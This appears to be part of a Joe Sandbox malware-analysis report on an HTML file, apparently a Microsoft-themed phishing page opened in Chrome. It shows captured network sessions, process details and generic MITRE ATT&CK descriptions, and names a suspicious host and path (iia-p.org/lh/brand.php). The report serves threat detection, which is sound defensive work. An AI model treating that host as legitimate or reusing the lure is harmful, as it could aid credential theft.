2024-04-26 04:28:11 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	13.107.213.41	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:11 UTC	419	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:11 UTC	786	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:11 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:56 GMT ETag: 0x8D7B0072D292595 x-ms-request-id: 1b95d27d-201e-0074-6292-97bb96000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T042811Z-17644f8887f9qfxwmwnf4q7tac00000006zg0000000087pv x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 04:28:11 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	23.34.16.106	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:11 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 04:28:11 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0712) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=95687 Date: Fri, 26 Apr 2024 04:28:11 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	23.34.16.106	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:11 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 04:28:11 UTC	773	IN	HTTP/1.1 200 OK Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-CID: 7 X-CCC: US X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z Content-Type: application/octet-stream X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=95748 Date: Fri, 26 Apr 2024 04:28:11 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-26 04:28:11 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	192.232.216.145	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:11 UTC	345	OUT	GET /lh/brand.php HTTP/1.1 Host: iia-p.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:12 UTC	301	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:12 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 26 Apr 2024 04:28:12 GMT Vary: Accept-Encoding X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	13.107.213.41	443	5352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:12 UTC	376	OUT	GET /16.000.28595.2/images/favicon.ico HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 04:28:12 UTC	766	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 04:28:12 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Fri, 08 May 2020 12:39:06 GMT ETag: 0x8D7F34CCC610677 x-ms-request-id: 5ecc4e7e-501e-0057-2d92-9757a3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T042812Z-1865489d5f4c7br6veundbra3w00000000eg00000000cxuz x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-26 04:28:12 UTC	15618	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-26 04:28:12 UTC	1556	IN	Data Raw: 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49756	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:20 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ke6evYRZcpCHwR6&MD=BppByrgn HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 04:28:20 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: c503dcc9-8330-4b5c-a36e-3b5142b3a5db MS-RequestId: 77cca016-ef66-4e09-9394-dc1454c322a7 MS-CV: IBXN9Tc7sk2Hyl94.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 04:28:20 GMT Connection: close Content-Length: 24490
2024-04-26 04:28:20 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-26 04:28:20 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49768	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 04:28:58 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ke6evYRZcpCHwR6&MD=BppByrgn HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 04:28:59 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: bf6acf07-44df-47ed-a159-b79211b2bb9d MS-RequestId: 60ce3144-2142-41b1-9465-73b30406315d MS-CV: Q2mdTw2NEUO6/T2i.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 04:28:58 GMT Connection: close Content-Length: 25457
2024-04-26 04:28:59 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-26 04:28:59 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	06:28:00
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\DOC-Zcns1G_.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	06:28:04
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1908,i,12331105430848739512,8916628483745343975,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DOC-Zcns1G_.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

Windows Analysis Report
DOC-Zcns1G_.html